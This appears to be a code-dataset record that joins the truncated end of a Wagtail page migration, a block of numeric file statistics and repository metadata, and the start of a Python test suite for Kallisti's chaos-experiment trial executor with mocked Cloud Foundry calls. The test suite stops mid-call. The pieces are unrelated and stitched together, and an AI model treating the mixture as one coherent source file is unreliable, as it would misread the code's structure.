wagtail.wagtailcore.blocks.CharBlock(required=False)), ('height', wagtail.wagtailcore.blocks.IntegerBlock())))), ('clear_fixblock', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)),))), ('code_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('language', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('python', 'python'), ('css', 'css'), ('sql', 'sql'), ('javascript', 'javascript'), ('clike', 'clike'), ('markup', 'markup'), ('java', 'java')], default='python')), ('codes', wagtail.wagtailcore.blocks.TextBlock())))), ('table_block', common.blocks.table.CustomTableBlock()), ('calender_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('source', wagtail.wagtailcore.blocks.CharBlock(help_text='Such as: calendar@cos.io. You can also change the style of calendar block.', max_length=255, required=True))))), ('journal_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('participating journals', 'participating journals'), ('eligible journals', 'eligible journals'), ('journals signatory', 'journals signatory')], default='participating journals'))))), ('render_file', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('file_link', wagtail.wagtailcore.blocks.CharBlock(help_text='Full link to the file on the OSF', max_length=255, required=True))))), ('sponsor_partner_block', wagtail.wagtailcore.blocks.StructBlock((('displayChoice', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('sponsors', 'sponsors'), ('partners', 'partners')], default='sponsors')),))), ('collapse_block', wagtail.wagtailcore.blocks.StructBlock((('title', wagtail.wagtailcore.blocks.CharBlock()), ('list', common.blocks.collapsebox.CollapseBoxListBlock())))), ('button', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('description', wagtail.wagtailcore.blocks.CharBlock(max_length=255, required=True)), ('link', wagtail.wagtailcore.blocks.CharBlock(max_length=255, required=True)))))), blank=True, null=True),
),
migrations.AddField(
model_name='custompage',
name='menu_order',
field=models.IntegerField(blank=True, default=1, help_text='The order this page should appear in the menu. The lower the number, the more left the page will appear. This is required for all pages where "Show in menus" is checked.'),
),
migrations.AlterField(
model_name='custompage',
name='content',
field=wagtail.wagtailcore.fields.StreamField((('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.RichTextBlock(required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('statement', wagtail.wagtailcore.blocks.CharBlock()), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('imagechooser', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('column', common.blocks.columns.RowBlock()), ('tabs', wagtail.wagtailcore.blocks.StructBlock((('tab_list', common.blocks.tabs.TabListBlock()), ('tabs_style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('vertical', 'Vertical'), ('horizontal', 'Horizontal')], default='horizontal'))))), ('image', wagtail.wagtailcore.blocks.StructBlock((('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('max-width:225px;max-height:145px', 'Small'), ('max-width:225px;max-height:145px;padding-top:20px', 'Small Pushed Down 20px'), ('max_width:250px;max-height:250px', 'Medium'), ('max_width:250px;max-height:250px;padding-top:20px', 'Medium Pushed Down 20px'), ('height:auto', 'Shrink to Fit')], default='height:auto')), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('customImage', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('rich_text', wagtail.wagtailcore.blocks.RichTextBlock()), ('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. Be careful!')), ('people_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('concise-team', 'concise-team'), ('concise-ambassador', 'concise-ambassador'), ('detailed', 'detailed')], default='concise-team')), ('tag', wagtail.wagtailcore.blocks.CharBlock(max_length=20))))), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('text', wagtail.wagtailcore.blocks.RichTextBlock())))), ('hero_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('image', wagtail.wagtailimages.blocks.ImageChooserBlock(required=True)), ('description', wagtail.wagtailcore.blocks.RawHTMLBlock(required=True)), ('image_display_setting', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('background', 'Cover the whole Hero as a background'), ('icon', 'Center the image in the middle of the hero block')])), ('text_color', wagtail.wagtailcore.blocks.CharBlock(help_text='Enter a color for the text.'))))), ('spotlight_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('bubbles', wagtail.wagtailcore.blocks.StreamBlock((('bubble_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('title', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))),)))))), ('job_whole_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)),))), ('embed_block', wagtail.wagtailembeds.blocks.EmbedBlock()), ('whitespaceblock', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('height', wagtail.wagtailcore.blocks.IntegerBlock())))), ('clear_fixblock', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)),))), ('code_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('language', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('python', 'python'), ('css', 'css'), ('sql', 'sql'), ('javascript', 'javascript'), ('clike', 'clike'), ('markup', 'markup'), ('java', 'java')], default='python')), ('codes', wagtail.wagtailcore.blocks.TextBlock())))), ('table_block', common.blocks.table.CustomTableBlock()), ('calender_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('source', wagtail.wagtailcore.blocks.CharBlock(help_text='Such as: calendar@cos.io. You can also change the style of calendar block.', max_length=255, required=True))))), ('journal_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('participating journals', 'participating journals'), ('eligible journals', 'eligible journals'), ('journals signatory', 'journals signatory')], default='participating journals'))))), ('render_file', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('file_link', wagtail.wagtailcore.blocks.CharBlock(help_text='Full link to the file on the OSF', max_length=255, required=True))))), ('sponsor_partner_block', wagtail.wagtailcore.blocks.StructBlock((('displayChoice', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('sponsors', 'sponsors'), ('partners', 'partners')], default='sponsors')),))), ('collapse_block', wagtail.wagtailcore.blocks.StructBlock((('title', wagtail.wagtailcore.blocks.CharBlock()), ('list', common.blocks.collapsebox.CollapseBoxListBlock())))), ('button', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('description', wagtail.wagtailcore.blocks.CharBlock(max_length=255, required=True)), ('link', wagtail.wagtailcore.blocks.CharBlock(max_length=255, required=True)))))), blank=True, null=True),
),
]
| 351.493069
| 16,882
| 0.729223
| 19,002
| 177,504
| 6.726555
| 0.029681
| 0.216026
| 0.277895
| 0.131985
| 0.95891
| 0.956336
| 0.945023
| 0.94022
| 0.94022
| 0.936613
| 0
| 0.016396
| 0.073655
| 177,504
| 504
| 16,883
| 352.190476
| 0.760944
| 0.000383
| 0
| 0.622222
| 1
| 0.008081
| 0.266202
| 0.043374
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.030303
| 0
| 0.040404
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
a766d6695c40ddd18b7e85546f4f45d64e73b489
| 41,005
|
py
|
Python
|
tests/kallisticore/lib/test_trial_executor.py
|
jpmorganchase/kallisti-core
|
d9dfcaa2ec3c9cd26dd37b5f2c39c3788a3d05aa
|
[
"Apache-2.0"
] | 1
|
2022-03-03T14:27:25.000Z
|
2022-03-03T14:27:25.000Z
|
tests/kallisticore/lib/test_trial_executor.py
|
jpmorganchase/kallisti-core
|
d9dfcaa2ec3c9cd26dd37b5f2c39c3788a3d05aa
|
[
"Apache-2.0"
] | null | null | null |
tests/kallisticore/lib/test_trial_executor.py
|
jpmorganchase/kallisti-core
|
d9dfcaa2ec3c9cd26dd37b5f2c39c3788a3d05aa
|
[
"Apache-2.0"
] | 1
|
2022-03-09T05:57:55.000Z
|
2022-03-09T05:57:55.000Z
|
import uuid
from unittest import mock
from unittest.mock import Mock, ANY, call
from django.conf import settings
from django.test import TestCase
from django.utils import timezone
from kallisticore import signals
from kallisticore.lib.observe.observer import Observer
from kallisticore.lib.trial_executor import TrialExecutor, execute_trial
from kallisticore.models import Experiment
from kallisticore.models.step import Step
from kallisticore.models.trial import Trial, TrialStatus
from kallisticore.signals import execute_plan_for_trial
def create_experiment_and_trial(parameters, steps, pre_steps=None,
post_steps=None, runtime_parameters=None):
experiment_name = 'some-experiment-' + str(uuid.uuid4())
signals.post_save.disconnect(execute_plan_for_trial, sender=Trial)
experiment = Experiment.create(
name=experiment_name, parameters=parameters,
pre_steps=Step.convert_to_steps(pre_steps or []),
steps=Step.convert_to_steps(steps),
post_steps=Step.convert_to_steps(post_steps or []))
trial = Trial.create(experiment=experiment,
parameters=(runtime_parameters or {}))
signals.post_save.connect(execute_plan_for_trial, sender=Trial)
return trial
class TestTrialExecutor(TestCase):
module_map = {'cf': 'kallisticore.modules.cloud_foundry'}
LOG_REC = 'kallisticore.lib.trial_executor.TrialLogRecord'
STEP_REC = 'kallisticore.lib.trial_executor.TrialStepLogRecord'
COMMIT = 'kallisticore.lib.trial_executor.TrialLogRecorder.commit'
CF_GET_APP = 'chaoscf.api.get_app_by_name'
CF_GET_ORG = 'chaoscf.api.get_org_by_name'
CF_STOP_APP = 'chaoscf.actions.stop_app'
CF_START_APP = 'chaoscf.actions.start_app'
CF_EXEC = 'kallisticore.modules.cloud_foundry.cloud_foundry_action.'\
'CloudFoundryAction.execute'
def setUp(self):
self.app_name = 'hello-world'
self.org = 'MY-ORG'
self.cf_api_url = 'https://cf-api.test'
self.health_endpoint = 'https://health-check.test/health'
self.parameters = {'cf_org': self.org,
'app_name': self.app_name,
'cf_api_url': self.cf_api_url}
self.pre_step_health_check = {
'step': 'HTTP pre health check',
'do': 'cm.http_probe',
'where': {
'url': '{{ health_endpoint }}'
}}
self.step_get_app_by_name = {
'step': 'Get CF App by Name',
'do': 'cf.get_app_by_name',
'where': {
'cf_api_url': '{{ cf_api_url }}',
'app_name': '{{ app_name }}',
}}
self.step_get_org_by_name = {
'step': 'Get CF Org by Name',
'do': 'cf.get_org_by_name',
'where': {
'cf_api_url': '{{ cf_api_url }}',
'org_name': '{{ cf_org }}',
}}
self.post_step_health_check = {
'step': 'HTTP health check',
'do': 'cm.http_probe',
'where': {
'url': '{{health_endpoint}}'
}}
self.steps = [self.step_get_app_by_name,
self.step_get_org_by_name]
self.pre_steps = [self.pre_step_health_check]
self.post_steps = [self.post_step_health_check]
self.populated_step_get_app_by_name = {
'step': 'Get CF App by Name',
'do': 'cf.get_app_by_name',
'where': {
'cf_api_url': self.cf_api_url,
'app_name': self.app_name,
}}
self.populated_step_get_org_by_name = {
'step': 'Get CF Org by Name',
'do': 'cf.get_org_by_name',
'where': {
'cf_api_url': self.cf_api_url,
'org_name': self.org,
}}
self.populated_pre_step_health_check = {
'step': 'HTTP pre health check',
'do': 'cm.http_probe',
'where': {
'url': self.health_endpoint
}}
self.populated_post_step_health_check = {
'step': 'HTTP health check',
'do': 'cm.http_probe',
'where': {
'url': self.health_endpoint
}}
self._populated_steps = [self.populated_step_get_app_by_name,
self.populated_step_get_org_by_name]
self._populated_pre_steps = [self.populated_pre_step_health_check]
self._populated_post_steps = [self.populated_post_step_health_check]
signals.post_save.disconnect(execute_plan_for_trial, sender=Trial)
self._trial = create_experiment_and_trial(self.parameters, self.steps)
def tearDown(self):
signals.post_save.connect(execute_plan_for_trial, sender=Trial)
class TestTrialLogRecorderSetup(TestTrialExecutor):
def test_context_enter_sets_up_trial_log_recorder(self):
log_rec_path = 'kallisticore.lib.trial_executor.TrialLogRecorder'
with mock.patch(log_rec_path) as mock_log_recorder_cls:
executor = TrialExecutor(self._trial, {}, {})
executor.__enter__()
mock_log_recorder_cls.assert_called_once_with(self._trial.id)
class TestTrialRunScenarioStepsSucceeded(TestTrialExecutor):
def test_execute_all_commands(self):
with mock.patch(self.CF_GET_APP) as app_action, \
mock.patch(self.CF_GET_ORG) as org_action, \
TrialExecutor(self._trial, self.module_map, {}) as trial_executor:
trial_executor.run()
app_action.assert_called_once_with(app_name="hello-world",
configuration=ANY, secrets=ANY)
org_action.assert_called_once_with(org_name="MY-ORG",
configuration=ANY, secrets=ANY)
def test_set_status_to_in_progress_at_run(self):
executor = TrialExecutor(self._trial, self.module_map, {})
with mock.patch(self.CF_GET_APP), mock.patch(self.CF_GET_ORG):
executor.__enter__()
executor.run()
self.assertEqual(self._trial.status, TrialStatus.IN_PROGRESS.value)
def test_set_status_to_successful(self):
with mock.patch(self.CF_GET_APP), mock.patch(self.CF_GET_ORG), \
TrialExecutor(self._trial, self.module_map, {}) as trial_executor:
trial_executor.run()
self.assertEqual(self._trial.status, TrialStatus.SUCCEEDED.value)
def test_update_executed_at_to_date_time_object(self):
with mock.patch(self.CF_GET_APP), mock.patch(self.CF_GET_ORG), \
TrialExecutor(self._trial, self.module_map, {}) as trial_executor:
trial_executor.run()
self.assertIsInstance(self._trial.executed_at, timezone.datetime)
def test_log_trial_with_parameter_interpolation(self):
with mock.patch(self.LOG_REC) as mock_log_rec_cls, \
mock.patch(self.STEP_REC) as mock_step_rec_cls, \
mock.patch(self.COMMIT) as mock_rec_commit, \
mock.patch(self.CF_GET_APP) as app_cmd_mock, \
mock.patch(self.CF_GET_ORG) as org_cmd_mock, \
TrialExecutor(self._trial, self.module_map, {}) as trial_executor:
mock_trial_log = mock.Mock()
mock_trial_log.append = mock.Mock()
mock_log_rec_cls.return_value = mock_trial_log
mock_trial_step_log = mock.Mock()
mock_trial_step_log.append = mock.Mock()
mock_step_rec_cls.return_value = mock_trial_step_log
trial_executor.run()
mock_step_rec_cls.assert_has_calls([
call('steps', 'Get app by name',
self.populated_step_get_app_by_name['where']),
call().append('INFO', 'Starting command execution.'),
call().append('INFO',
"Result: {}.".format(app_cmd_mock.return_value)),
call().append('INFO', 'Completed.'),
call('steps', 'Get org by name',
self.populated_step_get_org_by_name['where']),
call().append('INFO', 'Starting command execution.'),
call().append('INFO',
"Result: {}.".format(org_cmd_mock.return_value)),
call().append('INFO', 'Completed.'),
])
mock_log_rec_cls.assert_has_calls([
call('result'),
call().append('INFO', 'Trial Completed.')
])
mock_rec_commit.assert_has_calls([
call(mock_trial_step_log),
call(mock_trial_step_log),
call(mock_trial_log)
])
self.assertEqual(self._trial.status, TrialStatus.SUCCEEDED.value)
def test_log_trial_without_param_interpolation(self):
step_get_app_by_name = {'step': 'Get CF App by Name',
'do': 'cf.get_app_by_name',
'where': {
'cf_api_url': self.cf_api_url,
'app_name': self.app_name}}
step_get_org_by_name = {'step': 'Get CF Org by Name',
'do': 'cf.get_org_by_name',
'where': {
'cf_api_url': self.cf_api_url,
'org_name': self.org}}
steps = [step_get_app_by_name, step_get_org_by_name]
trial = create_experiment_and_trial({}, steps)
with mock.patch(self.LOG_REC) as mock_log_rec_cls, \
mock.patch(self.STEP_REC) as mock_step_rec_cls, \
mock.patch(self.COMMIT) as mock_rec_commit, \
mock.patch(self.CF_GET_APP) as app_cmd_mock, \
mock.patch(self.CF_GET_ORG) as org_cmd_mock,\
TrialExecutor(trial, self.module_map, {}) as trial_executor:
mock_trial_log = mock.Mock()
mock_trial_log.append = mock.Mock()
mock_log_rec_cls.return_value = mock_trial_log
mock_trial_step_log = mock.Mock()
mock_trial_step_log.append = mock.Mock()
mock_step_rec_cls.return_value = mock_trial_step_log
trial_executor.run()
mock_step_rec_cls.assert_has_calls([
call('steps', 'Get app by name', step_get_app_by_name['where']),
call().append('INFO', 'Starting command execution.'),
call().append('INFO',
"Result: {}.".format(app_cmd_mock.return_value)),
call().append('INFO', 'Completed.'),
call('steps', 'Get org by name', step_get_org_by_name['where']),
call().append('INFO', 'Starting command execution.'),
call().append('INFO',
"Result: {}.".format(org_cmd_mock.return_value)),
call().append('INFO', 'Completed.'),
])
mock_log_rec_cls.assert_has_calls([
call('result'),
call().append('INFO', 'Trial Completed.')
])
mock_rec_commit.assert_has_calls([
call(mock_trial_step_log),
call(mock_trial_step_log),
call(mock_trial_log)
])
self.assertEqual(trial.status, TrialStatus.SUCCEEDED.value)
def test_interpolation_from_trial_definition(self):
parameters = {}
trial = create_experiment_and_trial(
parameters, self.steps, runtime_parameters=self.parameters)
with mock.patch(self.LOG_REC) as mock_log_rec_cls, \
mock.patch(self.STEP_REC) as mock_step_rec_cls, \
mock.patch(self.COMMIT) as mock_rec_commit, \
mock.patch(self.CF_GET_APP) as app_cmd_mock, \
mock.patch(self.CF_GET_ORG) as org_cmd_mock, \
TrialExecutor(trial, self.module_map, {}) as trial_executor:
mock_trial_log = mock.Mock()
mock_trial_log.append = mock.Mock()
mock_log_rec_cls.return_value = mock_trial_log
mock_trial_step_log = mock.Mock()
mock_trial_step_log.append = mock.Mock()
mock_step_rec_cls.return_value = mock_trial_step_log
trial_executor.run()
mock_step_rec_cls.assert_has_calls([
call('steps', 'Get app by name',
self.populated_step_get_app_by_name['where']),
call().append('INFO', 'Starting command execution.'),
call().append('INFO',
"Result: {}.".format(app_cmd_mock.return_value)),
call().append('INFO', 'Completed.'),
call('steps', 'Get org by name',
self.populated_step_get_org_by_name['where']),
call().append('INFO', 'Starting command execution.'),
call().append('INFO',
"Result: {}.".format(org_cmd_mock.return_value)),
call().append('INFO', 'Completed.')])
mock_log_rec_cls.assert_has_calls([
call('result'),
call().append('INFO', 'Trial Completed.')])
mock_rec_commit.assert_has_calls([
call(mock_trial_step_log),
call(mock_trial_step_log),
call(mock_trial_log)])
self.assertEqual(trial.status, TrialStatus.SUCCEEDED.value)
def test_log_return_value_when_present(self):
with mock.patch(self.LOG_REC) as mock_log_rec_cls, \
mock.patch(self.STEP_REC) as mock_step_rec_cls, \
mock.patch(self.COMMIT) as mock_rec_commit, \
mock.patch(self.CF_GET_APP) as app_cmd_mock, \
mock.patch(self.CF_GET_ORG) as org_cmd_mock, \
TrialExecutor(self._trial, self.module_map, {}) \
as trial_executor:
mock_trial_log = mock.Mock()
mock_trial_log.append = mock.Mock()
mock_log_rec_cls.return_value = mock_trial_log
mock_trial_step_log = mock.Mock()
mock_trial_step_log.append = mock.Mock()
mock_step_rec_cls.return_value = mock_trial_step_log
app_cmd_mock.return_value = 'Hello World'
org_cmd_mock.return_value = 'MY-ORG'
trial_executor.run()
mock_step_rec_cls.assert_has_calls([
call('steps', 'Get app by name',
self.populated_step_get_app_by_name['where']),
call().append('INFO', 'Starting command execution.'),
call().append('INFO',
"Result: {}.".format(app_cmd_mock.return_value)),
call().append('INFO', 'Completed.'),
call('steps', 'Get org by name',
self.populated_step_get_org_by_name['where']),
call().append('INFO', 'Starting command execution.'),
call().append('INFO',
"Result: {}.".format(org_cmd_mock.return_value)),
call().append('INFO', 'Completed.'),
])
mock_log_rec_cls.assert_has_calls([
call('result'),
call().append('INFO', 'Trial Completed.')
])
mock_rec_commit.assert_has_calls([
call(mock_trial_step_log),
call(mock_trial_step_log),
call(mock_trial_log)
])
self.assertEqual(self._trial.status, TrialStatus.SUCCEEDED.value)
def test_should_update_parameters(self):
with mock.patch(self.CF_GET_APP), mock.patch(self.CF_GET_ORG), \
TrialExecutor(self._trial, self.module_map, {}) as trial_executor:
trial_executor.run()
self.assertEqual(self._trial.parameters, self.parameters)
def test_log_success_if_expect_passes(self):
step_description = 'Get CF App by Name'
expect_spec = [{'operator': 'eq', 'app_name': self.app_name}]
steps = [{'step': step_description,
'do': 'cf.get_app_by_name',
'where': {'app_name': self.app_name,
'cf_api_url': self.cf_api_url},
'expect': expect_spec}]
trial = create_experiment_and_trial({}, steps)
with mock.patch(self.LOG_REC) as mock_log_rec_cls, \
mock.patch(self.STEP_REC) as mock_step_rec_cls, \
mock.patch(self.COMMIT) as mock_rec_commit, \
mock.patch(self.CF_GET_APP) as app_cmd_mock, \
TrialExecutor(trial, self.module_map, {}) as trial_executor:
mock_trial_log = mock.Mock()
mock_trial_log.append = mock.Mock()
mock_log_rec_cls.return_value = mock_trial_log
mock_trial_step_log = mock.Mock()
mock_trial_step_log.append = mock.Mock()
mock_step_rec_cls.return_value = mock_trial_step_log
app_cmd_mock.return_value = {'app_name': self.app_name}
trial_executor.run()
mock_step_rec_cls.assert_has_calls([
call('steps', 'Get app by name',
{'app_name': self.app_name, 'cf_api_url': self.cf_api_url}),
call().append('INFO', 'Starting command execution.'),
call().append('INFO',
"Result: {}.".format(app_cmd_mock.return_value)),
call().append('INFO',
"Succeeded. All expectations passed: {}.".format(
expect_spec)),
call().append('INFO', 'Completed.'),
])
mock_log_rec_cls.assert_has_calls([
call('result'),
call().append('INFO', 'Trial Completed.')
])
mock_rec_commit.assert_has_calls([
call(mock_trial_step_log),
call(mock_trial_log)
])
self.assertEqual(trial.status, TrialStatus.SUCCEEDED.value)
class TestTrialRunScenarioStepsFailed(TestTrialExecutor):
def test_missing_param_in_steps(self):
parameters = {}
runtime_parameters = {'cf_api_url': self.cf_api_url,
'app_name': self.app_name}
trial = create_experiment_and_trial(
parameters, self.steps, runtime_parameters=runtime_parameters)
with mock.patch(self.LOG_REC) as mock_log_rec_cls, \
mock.patch(self.COMMIT) as mock_rec_commit, \
TrialExecutor(trial, self.module_map, {}) as trial_executor:
mock_trial_log = mock.Mock()
mock_trial_log.append = mock.Mock()
mock_log_rec_cls.return_value = mock_trial_log
trial_executor.run()
mock_log_rec_cls.assert_has_calls([
call('result'),
call().append('ERROR',
"Trial Invalid. Type: MissingParameterValueError. "
"Error: Trial is invalid because of missing value "
"in experiment parameters: 'cf_org'.")])
mock_rec_commit.assert_has_calls([call(mock_trial_log)])
self.assertEqual(trial.status, TrialStatus.INVALID.value)
def test_missing_param_in_post_steps(self):
parameters = {
'cf_api_url': self.cf_api_url,
'app_name': self.app_name}
trial = create_experiment_and_trial(
parameters, self.steps, post_steps=self.post_steps,
runtime_parameters=self.parameters)
with mock.patch(self.LOG_REC) as mock_log_rec_cls, \
mock.patch(self.COMMIT) as mock_rec_commit, \
TrialExecutor(trial, self.module_map, {}) as trial_executor:
mock_trial_log = mock.Mock()
mock_trial_log.append = mock.Mock()
mock_log_rec_cls.return_value = mock_trial_log
trial_executor.run()
mock_log_rec_cls.assert_has_calls([
call('result'),
call().append('ERROR',
"Trial Invalid. Type: MissingParameterValueError. "
"Error: Trial is invalid because of missing value "
"in experiment parameters: 'health_endpoint'.")])
mock_rec_commit.assert_has_calls([
call(mock_trial_log)])
self.assertEqual(trial.status, TrialStatus.INVALID.value)
def test_abort_with_execution_failure(self):
with mock.patch(self.CF_EXEC) as action_mock, \
TrialExecutor(self._trial, self.module_map, {}) \
as trial_executor:
action_mock.side_effect = Exception("api function error.")
trial_executor.run()
action_mock.assert_called_once_with()
self.assertEqual(self._trial.status, TrialStatus.FAILED.value)
def test_update_executed_at(self):
with mock.patch(self.CF_EXEC) as action_mock, \
TrialExecutor(self._trial, self.module_map, {})\
as trial_executor:
action_mock.side_effect = Exception("api function error.")
trial_executor.run()
self.assertIsInstance(self._trial.executed_at, timezone.datetime)
def test_log_steps_with_param_interpolation(self):
error_msg = "api function error."
with mock.patch(self.LOG_REC) as mock_log_rec_cls, \
mock.patch(self.STEP_REC) as mock_step_rec_cls, \
mock.patch(self.COMMIT) as mock_rec_commit, \
mock.patch(self.CF_EXEC) as action_mock, \
TrialExecutor(self._trial, self.module_map, {})\
as trial_executor:
mock_trial_log = mock.Mock()
mock_trial_log.append = mock.Mock()
mock_log_rec_cls.return_value = mock_trial_log
mock_trial_step_log = mock.Mock()
mock_trial_step_log.append = mock.Mock()
mock_step_rec_cls.return_value = mock_trial_step_log
action_mock.side_effect = Exception(error_msg)
trial_executor.run()
mock_step_rec_cls.assert_has_calls([
call('steps', 'Get app by name',
{'app_name': self.app_name, 'cf_api_url': self.cf_api_url}),
call().append('INFO', 'Starting command execution.'),
call().append('ERROR',
"Step failed. Type: Exception. "
"Error: api function error.")])
mock_log_rec_cls.assert_has_calls([
call('result'),
call().append('ERROR',
'Trial Failed. Type: StepsExecutionError. '
'Error: [in: steps, reason: api function error.]')])
mock_rec_commit.assert_has_calls([
call(mock_trial_step_log),
call(mock_trial_log)])
self.assertEqual(self._trial.status, TrialStatus.FAILED.value)
def test_log_steps_without_param_interpolation_on_exec_fail(self):
steps = [{'step': 'Get CF App by Name',
'do': 'cf.get_app_by_name',
'where': {
'cf_api_url': self.cf_api_url,
'app_name': self.app_name}},
{'step': 'Get CF Org by Name',
'do': 'cf.get_org_by_name',
'where': {
'cf_api_url': self.cf_api_url,
'org_name': self.org}}]
trial = create_experiment_and_trial({}, steps)
error_msg = "api function error."
with mock.patch(self.LOG_REC) as mock_log_rec_cls, \
mock.patch(self.STEP_REC) as mock_step_rec_cls, \
mock.patch(self.COMMIT) as mock_rec_commit, \
mock.patch(self.CF_EXEC) as action_mock, \
TrialExecutor(trial, self.module_map, {}) as trial_executor:
mock_trial_log = mock.Mock()
mock_trial_log.append = mock.Mock()
mock_log_rec_cls.return_value = mock_trial_log
mock_trial_step_log = mock.Mock()
mock_trial_step_log.append = mock.Mock()
mock_step_rec_cls.return_value = mock_trial_step_log
action_mock.side_effect = Exception(error_msg)
trial_executor.run()
mock_step_rec_cls.assert_has_calls([
call('steps', 'Get app by name',
{'app_name': self.app_name, 'cf_api_url': self.cf_api_url}),
call().append('INFO', 'Starting command execution.'),
call().append('ERROR',
"Step failed. Type: Exception. "
"Error: api function error.")])
mock_log_rec_cls.assert_has_calls([
call('result'),
call().append('ERROR',
'Trial Failed. Type: StepsExecutionError. '
'Error: [in: steps, reason: api function error.]')])
mock_rec_commit.assert_has_calls([
call(mock_trial_step_log),
call(mock_trial_log)])
self.assertEqual(trial.status, TrialStatus.FAILED.value)
def test_log_with_invalid_param(self):
steps = [{'step': 'Get CF App by Name',
'do': 'cf.get_app_by_name',
'where': {
'app_name': '{{ app_name}',
'env': '{{my_environment }}',
'pool': '{{ my_pool }}'}}]
trial = create_experiment_and_trial(
self.parameters, steps)
with mock.patch(self.LOG_REC) as mock_log_rec_cls, \
mock.patch(self.COMMIT) as mock_rec_commit, \
TrialExecutor(trial, self.module_map, {}) as trial_executor:
mock_trial_log = mock.Mock()
mock_trial_log.append = mock.Mock()
mock_log_rec_cls.return_value = mock_trial_log
trial_executor.run()
mock_log_rec_cls.assert_has_calls([
call('result'),
call().append('ERROR',
'Trial Failed. Type: TemplateSyntaxError. '
'Error: unexpected \'}\'')])
mock_rec_commit.assert_has_calls([
call(mock_trial_log)])
self.assertEqual(trial.status, TrialStatus.FAILED.value)
def test_log_error_message_if_expect_fails(self):
steps = [{'step': 'Get CF App by Name',
'do': 'cf.get_app_by_name',
'where': {
'cf_api_url': self.cf_api_url,
'app_name': self.app_name},
'expect': [
{'operator': 'eq', 'app_name': 'unexpected-app-name'}]}]
trial = create_experiment_and_trial({}, steps)
with mock.patch(self.LOG_REC) as mock_log_rec_cls, \
mock.patch(self.STEP_REC) as mock_step_rec_cls, \
mock.patch(self.COMMIT) as mock_rec_commit, \
mock.patch(self.CF_GET_APP) as app_mock, \
TrialExecutor(trial, self.module_map, {}) as trial_executor:
mock_trial_log = mock.Mock()
mock_trial_log.append = mock.Mock()
mock_log_rec_cls.return_value = mock_trial_log
mock_trial_step_log = mock.Mock()
mock_trial_step_log.append = mock.Mock()
mock_step_rec_cls.return_value = mock_trial_step_log
app_mock.return_value = {"app_name": "Hello World"}
trial_executor.run()
mock_step_rec_cls.assert_has_calls([
call('steps', 'Get app by name',
{'app_name': self.app_name, 'cf_api_url': self.cf_api_url}),
call().append('INFO', 'Starting command execution.'),
